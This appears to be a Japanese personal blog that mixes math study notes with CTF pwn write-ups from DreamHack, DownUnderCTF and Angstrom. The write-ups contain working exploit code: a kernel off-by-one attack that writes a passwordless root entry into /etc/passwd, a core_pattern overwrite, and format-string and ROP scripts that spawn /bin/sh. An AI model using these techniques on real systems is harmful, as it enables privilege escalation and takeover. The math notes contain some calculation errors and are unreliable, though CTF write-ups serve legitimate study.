House-of-Rona

1日目線形代数B

2026-06-08T00:00:00+00:00

線形代数B</h1>
期末が6/22(月)にあるらしい。</p>

演習1</h2>
$$ W= \left\lbrace \begin{pmatrix} x\\ y \end{pmatrix} \in\mathbb{R}^2 \mid x+y=1 \right\rbrace $$ $$ W \text{ は } \mathbb{R}^2 \text{ の部分空間であるか否かを答えよ。} $$</p>
集合Wが部分空間であるためには</p>

W の中の2つのベクトルを足しても、また W の中に入ること</li>
W の中のベクトルを実数倍しても、また W の中に入ること</li> </ol>
の2つを満たす必要がある。</p>
ここで、 $$ \begin{pmatrix} 0\\ 1 \end{pmatrix} \in W $$</p>
$$ \begin{pmatrix} 1\\ 0 \end{pmatrix} \in W $$ なので、両者ともにWの中のベクトルであるが、これら2つを足すと</p>
$$ \begin{pmatrix} 1\\ 1 \end{pmatrix} \notin W $$ となり、1を満たさない。よって、Wは$\mathbb{R}^2$の部分空間ではない。</p>
演習2</h2>
$$ \text{次のベクトルが1次独立であるか否かを答えよ。なお、}i\text{ は虚数単位である。} $$</p>
$$ (1)\quad \begin{pmatrix} 1\\ i\\ i-1 \end{pmatrix}, \quad \begin{pmatrix} 2i\\ -i-2\\ i+1 \end{pmatrix}, \quad \begin{pmatrix} i+1\\ -2\\ -4 \end{pmatrix} $$</p>
$$ (2)\quad \begin{pmatrix} 1\\ i\\ i-1 \end{pmatrix}, \quad \begin{pmatrix} 2i\\ -i-2\\ i+1 \end{pmatrix}, \quad \begin{pmatrix} i+1\\ -2\\ 4 \end{pmatrix} $$</p>
暗記事項として</p>
$\text{ベクトルが1次独立} \Rightarrow \text{ベクトルを並べた行列の行列式が0でない}$</p>
があるらしい。</p>
これを使う。サラスの公式で行列式を計算すると $$ \begin{vmatrix} 1 & 2i & i+1\\ i & -i-2 & -2\\ i-1 & i+1 & -4 \end{vmatrix} = 8i $$</p>
よって (1)は一次独立。</p>
同じようにして</p>
$$ \begin{vmatrix} 1 & 2i & i+1\\ i & -i-2 & -2\\ i-1 & i+1 & 4 \end{vmatrix} = 0 $$</p>
よって(2)は一次従属。</p>
演習3</h2>
\[ \mathbf{v}_1= \begin{pmatrix} 1\\ 1\\ 0 \end{pmatrix}, \quad \mathbf{v}_2= \begin{pmatrix} 0\\ 1\\ 1 \end{pmatrix}, \quad \mathbf{v}_3= \begin{pmatrix} 1\\ 2\\ 1 \end{pmatrix} \] \[ (1)\quad \langle \mathbf{v}_1,\mathbf{v}_2\rangle \text{ を集合の式で表せ。} \] \[ (2)\quad \langle \mathbf{v}_3\rangle \text{ を集合の式で表せ。} \] \[ (3)\quad \langle \mathbf{v}_1,\mathbf{v}_2\rangle \text{ と } \langle \mathbf{v}_3\rangle \text{ の関係を答えよ。} \]</p>
$\langle \rangle$ はその中のベクトルたちで作れるすべての1次結合の集合を表すらしい。</p>
katexの書き方がめんどくさそうかつそんなに難しくなさそう。</p>

2日目　微分積分B

2026-06-08T00:00:00+00:00

問題1</h1>
次の関数の連続性を調べなさい． $$ f(x,y)= \begin{cases} \dfrac{3xy}{2x^2+y^2}, & ((x,y)\ne(0,0))\\ 0, & ((x,y)=(0,0)) \end{cases} $$</p>
$(x,y)\neq(0,0)$のときは連続。$(x,y)=(0,0)$の時を考える。</p>
まず、$y=0$として近づけると</p>
$$ f(x,0)= \dfrac{0}{2x^2} $$ より、 $$ \lim_{n\to0}f(x,0) = 0 $$</p>
次に$y=x$として近づけると</p>
$$ f(x,x)= \dfrac{3x^2}{3x^2} = 1 $$</p>
となり、近づき方によって極限値が違うから、$f(x,y)$は$(0,0)$において不連続。</p>
連続性を調べるときはこういうのをとりあえず代入してみるといいらしい。</p>

$x=0$</li>
$y=0$</li>
$y=x$</li>
$y=x^2$</li> </ul>
問題2</h1>
1</h2>
次の関数を偏微分しなさい． $$ f(x,y)=x^3+3ax^2y-4xy^2+2y^3 \quad (a\text{ は定数}) $$</p>
偏微分するときは、片方を固定して考える。</p>
$$ f_x=3x^2+6axy-4xy^2\\ f_y=3ax^2-8xy+6y^2 $$</p>
2</h2>
$$ f(x,y)=e^{2x^2-y} $$</p>
同じくやる。</p>
$$ f_x=4xe^{2x^2-y}\\ f_y=-e^{2x^2-y} $$</p>
問題3</h1>
次の関数の第 2 次偏導関数を求めなさい．</p>
(1)</h2>
$$ f(x,y)=2x^3-3x^2y+5xy^2+y^3 $$</p>
$f_xx, f_xy, f_yx, f_yy$をそれぞれ求める。katexで書くのがめんどくさいので省略。</p>
ちなみに、$\dfrac{\partial}{\partial x}$って書くとxで微分することを意味するらしい。</p>
$$ f_xx = 12x−6y \\ f_xy =−6x+10y \\ f_yx =−6x+10y \\ f_yy =10x+6y $$</p>
(2)</h2>
$$ f(x,y)=xy\cos(x-y) $$</p>
$xy\cos(x-y)$の微分は積の微分と合成関数の微分を使う必要があるらしくて、積の微分を忘れてた。</p>
$$ (ab)' = a'b + ab' $$ らしいです。答えは省略。</p>
問題4</h1>
関数 $z=f(x,y)=x^2+2y^2-1$ の点 $$ (x,y,z)=(1,1,2) $$ における接平面を求めなさい．</p>
接平面の公式は $$ z - f(a,b) = f_x(a,b)(x-a) + f_y(a,b)(y-b) $$</p>
この式がよく分からなかったので一旦2次元のことを振り返る。</p>
$y = f(x)$の点aにおける接戦のことを思い出すと $$ y - f(a) = f'(a)(x-a) $$ で表されて、$f'(a)$とは接線の傾きになる。つまり、</p>
縦の変化量=傾き×横の変化量</p>
となる。これと一緒のことをしてるのが接平面の公式で</p>
zの変化量 = x方向に動いたことによるzの変化量 + y方向に動いたことによるzの変化量</p>
を表している。</p>
あとは代入して計算すると、</p>
$$ z - 2 = 2(x-1) + 4(y-1)\\ z = 2x + 4y -4 $$</p>
となる。</p>

Writeup of DreamHack Invitational 2025

2025-04-09T00:00:00+00:00

xoronly</h1>
stack上に無限に書き込むことができます。書き込みは既にある値とxorが取られれます。xor後の文字列は`puts</code>されます。</p>`

challenge</h2>
int</span> main</span>()</span></span>
{</span></span>
    char</span> buf</span>[</span>0x</span>100</span>]</span> =</span> {</span>0</span>,};</span></span>
</span>
    setvbuf</span>(stdin,</span> 0</span>,</span> 2</span>,</span> 0</span>);</span></span>
    setvbuf</span>(stdout,</span> 0</span>,</span> 2</span>,</span> 0</span>);</span></span>
    setvbuf</span>(stderr,</span> 0</span>,</span> 2</span>,</span> 0</span>);</span></span>
</span>
    puts</span>(</span>"Welcome to the XOR-only encryption service!"</span>);</span></span>
    puts</span>(</span>"We will encrypt your data with a single byte key."</span>);</span></span>
    puts</span>(</span>"Please enter your data"</span>);</span></span>
</span>
    while</span>(</span>1</span>)</span></span>
    {</span></span>
        printf</span>(</span>"> "</span>);</span></span>
</span>
        for</span>(</span>int</span> i</span>=</span>0</span>;; i</span>++</span>)</span></span>
        {</span></span>
            char</span> c </span>=</span> getchar</span>();</span></span>
            if</span>(c </span>==</span> '</span>\n</span>'</span>)</span></span>
            {</span></span>
                buf</span>[i]</span> =</span> 0</span>;</span></span>
                break</span>;</span></span>
            }</span></span>
            if</span>(</span>!</span>isalnum</span>(c))</span></span>
            {</span></span>
                puts</span>(</span>"Invalid character detected!"</span>);</span></span>
                return</span> 0</span>;</span></span>
            }</span></span>
            buf</span>[i]</span> ^=</span> c;</span></span>
        }</span></span>
</span>
        printf</span>(</span>"Here is your encrypted data: "</span>);</span></span>
        puts</span>(buf);</span></span>
    }</span></span>
}</span></span></code></pre>exploit</h2>
aslr leak</h3>
__libc_start_main</code>のアドレスをputs(buf)</code>でleakします。</p>
ROP</h3>
[0x00, 0-9, A-z]</code>が入力できて、xorすることができるので、0 - 0x7f</code>までの任意の数値を作り出せます。
後はlibcのアドレスが0x00 - 0x7f</code>までで構成されるアドレスになるまで接続を繰り返すことで、pop rdi; system</code>のROPをします。</p>
kidheap</h1>
WIP</p>
ainque</h1>
The provided kernel module can load riscv ELF binary and run it in kernel context.</p>
vulnerability</h2>
pml4e_index</code> has no validation. It can exceed 0x200, which cause OOB access. \</p>
static</span> QCPU_EXIT_TYPE </span>write_memory</span>(</span>qvm_t</span> *</span>qvm</span>,</span> uint64_t</span> va</span>,</span> uint64_t</span> size</span>,</span> uint64_t</span> value</span>,</span> bool</span> is_signed</span>) {</span></span>
    for</span>(</span>int</span> i</span>=</span>0</span>; i</span><</span>size; i</span>++</span>) {</span></span>
        qcpu_pte_or_fail pte_safe </span>=</span> qcpu_get_pte_from_va_failsafe</span>(qvm->qcpu.cr3, va</span>+</span>i);</span></span>
        if</span>(pte_safe.success) {</span></span>
            ((</span>uint8_t *</span>)</span>PTE_TO_PHYS</span>(pte_safe.pte))[(va</span>+</span>i)</span> & 0x</span>fff</span>]</span> =</span> (</span>uint8_t</span>)((value </span>>></span> (i</span>*</span>8</span>))</span> & 0x</span>ff</span>);</span></span>
        }</span> else</span> {</span></span>
            return</span> QCPU_SIGSEGV;</span></span>
        }</span></span>
    }</span></span>
    return</span> QCPU_CONTINUE;</span></span>
}</span></span></code></pre>qcpu_pte_or_fail </span>qcpu_get_pte_from_va_failsafe</span>(</span>qcpu_pte_t</span> ****</span>cr3</span>,</span> uint64_t</span> va</span>) {</span></span>
    qcpu_pte_t</span> ***</span>pml4e </span>=</span> qcpu_get_pml4e</span>(cr3, va </span>>></span> 39</span>);</span></span>
// the following omitted</span></span>
</span>
qcpu_pte_t</span> ***</span>qcpu_get_pml4e</span>(</span>qcpu_pte_t</span> ****</span>cr3,</span> uint64_t</span> pml4e_index)</span></span>
{</span></span>
    return</span> cr3</span>[pml4e_index];</span></span>
}</span></span></code></pre>exploit</h2>
kaslr bypass</h3>
The basic strategy is spraying msg_msg</code> and use it as cr3</code>.
msg_msg</code> has list_head</code> member, which has a valid pointer, they can be used as pml4e</code> or pdpe</code>.</p>
We can leak kbase by reading IDT region, which is located at fixed virtual address.</p>
  // VM side</span></span>
  unsigned long</span> gate </span>= *</span>(</span>long *</span>)</span>PTI_TO_VIRT</span>(</span>0x</span>2000</span> +</span> 1</span>,</span> 1</span>,</span> 0</span>,</span> 6</span>,</span> 0</span>)</span> >></span> 52</span>;</span></span>
  unsigned long</span> kbase_diff </span>=</span> gate </span>- 0x</span>820</span>;</span></span></code></pre>
To load crafted value as pml4e</code>, spray a bunch of msg_msg</code> struct after QVM_LOAD</code>. It contains the all possible pointer (0x200) pointing to &core_pattern</code> considering KASLR.</p>
  // Host side</span></span>
  rep</span>(i,</span> 0x</span>1f8</span>) {</span></span>
    ((</span>unsigned long *</span>)msg_buf.mtext)[i </span>+</span> 1</span>]</span> =</span></span>
    0x</span>ffffffff</span>lu * 0x</span>100000</span></span>
    |</span> (i </span>+ 0x</span>82b</span>lu</span>)</span> * 0x</span>100</span>lu</span>  // KASLR bypass</span></span>
    | 0x</span>7b</span></span>
    |</span> (</span>0x</span>8000000000000000</span>l</span>);</span></span>
  }</span></span></code></pre>

    
    IDT address and all possible kbase address</p></div>
core_pattern overwrite</h3>
By writing |/tmp/xd</code> into core_pattern</code> and causing crash, the kernel executes /tmp/xd</code> as root.</p>
  // VM side</span></span>
  *</span>(</span>long *</span>)</span>PTI_TO_VIRT</span>(</span>0x</span>2000</span> +</span> 1</span>,</span> 1</span>,</span> 0</span>,</span> 7</span> +</span> kbase_diff </span>& 0x</span>fff</span>,</span> 0x</span>c20</span>)</span> =</span></span>
      0x</span>64782f706d742f7c</span>;</span> // |/tmp/xd</span></span></code></pre>



DownUnderCTF 2024 | faulty kernel
2024-07-10T00:00:00+00:00
DownUnderCTF</a>のupsolveです。</p>
Faulty Kernel</h1>
概要</h2>
KernelはLinux 6.10.0-rc4で、SMAP,SMEP,kASLRは有効です。</p>
mmapとfault handlerがあるmisc deviceを登録するカーネルオブジェクトが渡されます。</p>
#define</span> PAGECOUNT</span> (</span>128</span>)</span></span>
</span>
struct</span> shared_buffer {</span></span>
	pgoff_t</span> pagecount;</span></span>
	struct</span> page</span>**</span> pages;</span></span>
};</span></span>
</span>
static struct</span> miscdevice dev;</span></span>
</span>
static struct</span> file_operations dev_fops </span>=</span> {</span></span>
	.owner </span>=</span> THIS_MODULE,</span></span>
	.open </span>=</span> dev_open,</span></span>
	.mmap </span>=</span> dev_mmap</span></span>
};</span></span>
</span>
static struct</span> vm_operations_struct dev_vm_ops </span>=</span> {</span></span>
	.fault </span>=</span> dev_vma_fault</span></span>
};</span></span>
</span>
static int</span> dev_mmap</span>(</span>struct</span> file</span>*</span> filp</span>,</span> struct</span> vm_area_struct</span>*</span> vma</span>) {</span></span>
	struct</span> shared_buffer</span>*</span> sbuf </span>=</span> filp->private_data;</span></span>
	pgoff_t</span> pages </span>=</span> vma_pages</span>(vma);</span></span>
	if</span> (pages </span>></span> sbuf->pagecount) {</span></span>
		return -</span>EINVAL;</span></span>
	}</span></span>
</span>
	vma->vm_ops</span> = &</span>dev_vm_ops;</span></span>
    	vma->vm_private_data</span> =</span> sbuf;</span></span>
</span>
	return</span> SUCCESS;</span></span>
}</span></span>
</span>
static</span> vm_fault_t</span> dev_vma_fault</span>(</span>struct</span> vm_fault </span>*</span>vmf</span>) {</span></span>
	struct</span> vm_area_struct </span>*</span>vma </span>=</span> vmf->vma;</span></span>
	struct</span> shared_buffer </span>*</span>sbuf </span>=</span> vma->vm_private_data;</span></span>
</span>
	pgoff_t</span> pgoff </span>=</span> vmf->pgoff;</span></span>
</span>
    	if</span> (pgoff </span>></span> sbuf->pagecount) {</span></span>
        	return</span> VM_FAULT_SIGBUS;</span></span>
    	}</span></span>
</span>
	get_page</span>(sbuf->pages[pgoff]);</span></span>
	vmf->page</span> =</span> sbuf->pages[pgoff];</span></span>
</span>
	return</span> SUCCESS;</span></span>
}</span></span>
</span>
static int</span> dev_open</span>(</span>struct</span> inode</span>*</span> inodep</span>,</span> struct</span> file</span>*</span> filp</span>) {</span></span>
	int</span> i;</span></span>
	struct</span> shared_buffer</span>*</span> sbuf;</span></span>
</span>
	sbuf </span>=</span> kzalloc</span>(</span>sizeof</span>(</span>*</span>sbuf), GFP_KERNEL);</span></span>
	if</span> (</span>!</span>sbuf) {</span></span>
		printk</span>(KERN_INFO </span>"[dev] Failed to initilise buffer.</span>\n</span>"</span>);</span></span>
		goto</span> fail;</span></span>
	}</span></span>
</span>
	sbuf->pagecount</span> =</span> PAGECOUNT;</span></span>
	sbuf->pages</span> =</span> kmalloc_array</span>(sbuf->pagecount,</span> sizeof</span>(</span>*</span>sbuf->pages), GFP_KERNEL);</span></span>
	if</span> (</span>!</span>sbuf->pages) {</span></span>
		printk</span>(KERN_INFO </span>"[dev] Failed to initilise buffer.</span>\n</span>"</span>);</span></span>
		goto</span> fail_alloc_buf;</span></span>
	}</span></span>
</span>
	for</span> (i </span>=</span> 0</span>; i </span><</span> sbuf->pagecount; i</span>++</span>) {</span></span>
		sbuf->pages[i]</span> =</span> alloc_page</span>(GFP_KERNEL);</span></span>
		if</span> (</span>!</span>sbuf->pages[i]) {</span></span>
			printk</span>(KERN_ERR </span>"[dev] Failed to allocate page </span>%d</span>.</span>\n</span>"</span>, i);</span></span>
			goto</span> fail_alloc_pages;</span></span>
		}</span></span>
	}</span></span>
</span>
	filp->private_data</span> =</span> sbuf;</span></span>
	return</span> SUCCESS;</span></span>
</span>
fail_alloc_pages:</span></span>
	while</span> (i</span>--</span>) {</span></span>
		if</span> (sbuf->pages[i]) {</span></span>
			__free_page</span>(sbuf->pages[i]);</span></span>
		}</span></span>
	}</span></span>
</span>
	kfree</span>(sbuf->pages);</span></span>
fail_alloc_buf:</span></span>
	kfree</span>(sbuf);</span></span>
fail:</span></span>
	return</span> FAIL;</span></span>
}</span></span>
</span>
static int</span> dev_init</span>(</span>void</span>) {</span></span>
	dev.minor</span> =</span> MISC_DYNAMIC_MINOR;</span></span>
    	dev.name</span> =</span> DEV_NAME;</span></span>
    	dev.fops</span> = &</span>dev_fops;</span></span>
    	dev.mode</span> = 0</span>644</span>;</span></span>
</span>
	if</span> (</span>misc_register</span>(</span>&</span>dev)) {</span></span>
        	return</span> FAIL;</span></span>
    	}</span></span>
</span>
</span>
	printk</span>(KERN_INFO </span>"[dev] It's mappin' time!</span>\n</span>"</span>);</span></span>
</span>
	return</span> SUCCESS;</span></span>
}</span></span></code></pre>
図示すると以下のような状態になっています。


    
    問題の概観</p></div>
</p>
脆弱性</h2>
脆弱性はdev_vma_fault</code>関数にあります。 

この関数は、pagefaultが発生した際にpgoff番目のpageを返す処理を実装していますが、sbuf->pagecount</code>はpagesの個数を表しているためoff-by-oneが発生します。</p>
if</span> (pgoff </span>></span> sbuf</span>-></span>pagecount) {</span></span>
    return</span> VM_FAULT_SIGBUS;</span></span>
}</span></span>
</span>
get_page</span>(sbuf</span>-></span>pages</span>[pgoff]);</span></span>
vmf</span>-></span>page </span>=</span> sbuf</span>-></span>pages</span>[pgoff];</span></span></code></pre>攻撃</h2>
mmap時のチェックに問題はないので、mmapに渡せる最大サイズはPAGE * 128</code>となります。その後mremapを呼び、sizeをPAGE * 129</code>に変更しsbuf->pages[128]</code>にアクセスすると上記のOOB Readが出来ます。

では、どのオブジェクトを隣接させると良いでしょうか？
pagesはkmalloc_array(sbuf->pagecount, sizeof(*sbuf->pages), GFP_KERNEL)</code>で確保され、これはkmalloc-1kに入ります。ということは、最初の8byteがpage*</code>、かつ、kmalloc-1k
sizedな構造体を探すと良さそうでこれはpipe_buffer</a>が該当します。

したがって、exploit時のheapの状態はこのようになっていると良さそうです。


    
    exploit前のheapの状態</p></div>
</p>
というわけで権限昇格までの流れは以下のとおりになります。</p>

kmalloc 1kを埋める</li>
pipe_bufferを大量に確保</li>
pipe_bufferを1つおきに開放</li>
pipe_bufferの先頭要素を/etc/passwdのpageに変更</li>
問題のドライバにmmap</li>
mremap</li>
OOB Readを使って/etc/passwdに書き込み</li>
</ol>
Exploit</h2>
#include</span> "./exploit.h"</span></span>
#include</span> "./common.h"</span></span>
</span>
/*********** commands ******************/</span></span>
#define</span> DEV_PATH</span> "/dev/challenge"</span>   // the path the device is placed</span></span>
</span>
#define</span> PAGECOUNT</span> 128</span></span>
</span>
/*********** constants ******************/</span></span>
// (END globals)</span></span>
</span>
struct</span> fd_pair {</span></span>
  int</span> fd</span>[</span>2</span>];</span></span>
};</span></span>
</span>
struct</span> fd_pair </span>pairs</span>[</span>0x</span>100</span>];</span></span>
</span>
void</span> heap_spray</span>() {</span></span>
  for</span> (</span>int</span> i </span>=</span> 0</span>; i </span>< 0x</span>100</span>; i</span>++</span>) {</span></span>
    if</span> (</span>pipe</span>(</span>pairs</span>[i].fd)) {</span></span>
      errExit</span>(</span>"pipe"</span>);</span></span>
    }</span></span>
  }</span></span>
</span>
  for</span> (</span>int</span> i </span>=</span> 0</span>; i </span>< 0x</span>100</span>; i</span>++</span>) {</span></span>
    if</span> (</span>!</span>(i </span>%</span> 2</span>)) {</span></span>
      if</span> (</span>close</span>(</span>pairs</span>[i].fd[</span>0</span>])</span> ||</span> close</span>(</span>pairs</span>[i].fd[</span>1</span>])) {</span></span>
	errExit</span>(</span>"close"</span>);</span></span>
      }</span></span>
    }</span></span>
  }</span></span>
}</span></span>
</span>
void</span> splice_pipe</span>(</span>void *</span>addr</span>) {</span></span>
  for</span> (</span>int</span> i </span>=</span> 0</span>; i </span>< 0x</span>100</span>; i</span>++</span>) {</span></span>
    if</span> (i </span>%</span> 2</span>) {</span></span>
      struct</span> iovec iov </span>=</span> {.iov_base</span>=</span>addr, .iov_len</span>=</span>PAGE};</span></span>
      if</span> (</span>vmsplice</span>(</span>pairs</span>[i].fd[</span>1</span>],</span> &</span>iov,</span> 1</span>,</span> 0</span>)</span> <</span> 0</span>) {</span></span>
	errExit</span>(</span>"vmsplice"</span>);</span></span>
      }</span></span>
    }</span></span>
  }</span></span>
}</span></span>
</span>
int</span> main</span>(</span>int</span> argc</span>,</span> char *</span>argv</span>[]</span>) {</span></span>
  char *</span>BACKDOOR </span>=</span> "root::0:0:root:/root:/bin/sh"</span>;</span></span>
  int</span> passwd_fd </span>=</span> SYSCHK</span>(</span>open</span>(</span>"/etc/passwd"</span>, O_RDONLY));</span></span>
  void*</span> passwd_addr </span>=</span> SYSCHK</span>(</span>mmap</span>(</span>0</span>, PAGE, PROT_READ, MAP_SHARED, passwd_fd,</span> 0</span>));</span></span>
  printf</span>(</span>"passwd addr: </span>%p\n</span>"</span>, passwd_addr);</span></span>
  heap_spray</span>();</span></span>
  int</span> fd </span>=</span> open</span>(DEV_PATH, O_RDWR);</span></span>
  splice_pipe</span>(passwd_addr);</span></span>
</span>
  void*</span> old_addr </span>=</span> SYSCHK</span>(</span>mmap</span>(</span>0</span>, PAGE </span>*</span> PAGECOUNT, PROT_READ</span>|</span>PROT_WRITE, MAP_SHARED, fd,</span> 0</span>));</span></span>
  void*</span> new_addr </span>=</span> SYSCHK</span>(</span>mremap</span>(old_addr,PAGE </span>*</span> PAGECOUNT, (PAGE</span>+</span>1</span>)</span> *</span> PAGECOUNT, MREMAP_MAYMOVE));</span></span>
  char*</span> passwd_str </span>=</span> (</span>char*</span>)new_addr</span>+</span>(PAGE</span>*</span>PAGECOUNT);</span></span>
  int</span> pid </span>=</span> getpid</span>();</span></span>
  memcpy</span>(passwd_str, BACKDOOR,</span> strlen</span>(BACKDOOR)</span>+</span>1</span>);</span></span>
  system</span>(</span>"/bin/su -"</span>);</span></span>
  system</span>(</span>"/bin/sh"</span>);</span></span>
</span>
  // end of life</span></span>
  puts</span>(</span>"[ ] END of life..."</span>);</span></span>
  sleep</span>(</span>999999</span>);</span></span>
}</span></span></code></pre>
概略はつかめると思いますが、使っているマクロの詳細などを知りたい方はGitHub</a>まで。</p>


Angstorm 2024
2024-05-30T00:00:00+00:00
Angstorm</a>にTPCとして出場しました。
コンテスト中にpwn7問を解き、コンテスト後にとstacksort追加で解きました。</p>
[pwn] Exam</h1>
概要</h2>

trust_level</code>が0x7ffffffe</code>超えるとflagがもらえます。</li>
trust_level</code>は-detrust</code>で初期化され、ループの中で1づつ増加させることができます。</li>
detrust</code>は入力で与えることができます。</li>
detrust</code>は正の範囲で入力できる。</li>
</ul>
exploit</h2>
detrust</code>を0x7fffffff</code>にすることでtrust_level</code>を0x80000001</code>にすることができます。
あとはこれに2を足す処理を行うとtrust_level</code>が0x7fffffff</code>になりflagが得られます。</p>
[pwn] presidential</h1>
概要</h2>
任意のshellcodeを実行してくれます。</p>
exploit</h2>
https://www.exploit-db.com/exploits/42179
を送るとシェルが降ってきます。</p>
[pwn] og</h1>
解析</h2>
checksecをします。</p>
[*] '/home/user/ctf/og/og'</span></span>
    Arch:     amd64-64-little</span></span>
    RELRO:    Partial RELRO</span></span>
    Stack:    Canary found</span></span>
    NX:       NX enabled</span></span>
    PIE:      No PIE (0x400000)</span></span></code></pre>脆弱性</h2>
自明なFSBとBoFがあります。</p>
攻撃</h2>
FSBを使ってlibc leakをし、BoFでmainにリターンします。その後、one_gadgetを利用してシェルを取ります。</p>
exploit</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i: i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug([elf_name], script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
</span>
    sla(</span>b</span>'name: '</span>,</span></span>
        b</span>'%15$16p!'</span> +</span> fmtstr_payload(</span>7</span>, {</span>0x</span>404018</span>:</span> 0x</span>40126d</span>},</span> numbwritten</span>=</span>17</span>,</span> write_size</span>=</span>'short'</span>)</span> +</span> p64(</span></span>
            elf.sym[</span>'main'</span>]</span> +</span> 5</span>))</span></span>
    buf</span> =</span> t.recvuntil(</span>b</span>'!'</span>)[:</span>-</span>1</span>]</span></span>
    print</span>(</span>f</span>'</span>{</span>buf</span>=</span>}</span>'</span>)</span></span>
    libc_base</span> =</span> int</span>(buf[buf.rindex(</span>b</span>'0x'</span>):],</span> 16</span>)</span> - 0x</span>29d90</span></span>
    print</span>(</span>f</span>'</span>{</span>libc_base</span>=:x</span>}</span>'</span>)</span></span>
</span>
    sla(</span>b</span>'name:'</span>,</span> b</span>'</span>\x00</span>'</span> * 0x</span>30</span> +</span> p64(</span>0x</span>404700</span>)</span> +</span> p64(libc_base</span> + 0x</span>ebc81</span>))</span></span>
</span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 0</span></span>
debug</span> =</span> 0</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./og"</span></span>
libc_name</span> =</span> ""</span></span>
remote_addr, remote_port</span> =</span> "challs.actf.co 31312"</span>.split()</span></span>
if</span> libc_name:</span></span>
    libc:</span> ELF</span> =</span> ELF(libc_name)</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
script</span> =</span> """</span></span>
"""</span></span>
t</span> =</span> create_io()</span></span>
solve()</span></span></code></pre>[pwn] bap</h1>
解析</h2>
[*] '/home/user/ctf/bap/bap'</span></span>
    Arch:     amd64-64-little</span></span>
    RELRO:    Full RELRO</span></span>
    Stack:    No canary found</span></span>
    NX:       NX enabled</span></span>
    PIE:      No PIE (0x400000)</span></span></code></pre>脆弱性</h2>
ogと同様にFSBとBoFがあります。</p>
攻撃</h2>
FSBを使ってlibc leakをし、BoFでmainにリターンします。その後ROPをします。</p>
exploit</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i: i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug([elf_name], script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
</span>
    sla(</span>b</span>':'</span>,</span> b</span>'%29$08pFIN'</span>.ljust(</span>0x</span>10</span>,</span> b</span>'</span>\x00</span>'</span>)</span> +</span> p64(</span>0x</span>404700</span>)</span> +</span> p64(elf.sym[</span>'main'</span>]</span> +</span> 88</span>)</span> +</span> p64(elf.sym[</span>'main'</span>]))</span></span>
    libc_base</span> =</span> int</span>(t.recvuntil(</span>b</span>'FIN'</span>)[:</span>-</span>3</span>],</span> 16</span>)</span> - 0x</span>29e40</span></span>
    libc.address</span> =</span> libc_base</span></span>
    print</span>(</span>f</span>'</span>{</span>libc_base</span>=:x</span>}</span>'</span>)</span></span>
    rop</span> =</span> ROP(libc)</span></span>
    rop.execv(</span>next</span>(libc.search(</span>b</span>'/bin/sh'</span>)),</span> 0</span>)</span></span>
    sla(</span>b</span>':'</span>,</span> b</span>'A'</span> * 0x</span>18</span> +</span> rop.chain())</span></span>
</span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 0</span></span>
debug</span> =</span> 0</span></span>
radare</span> =</span> 0</span></span>
</span>
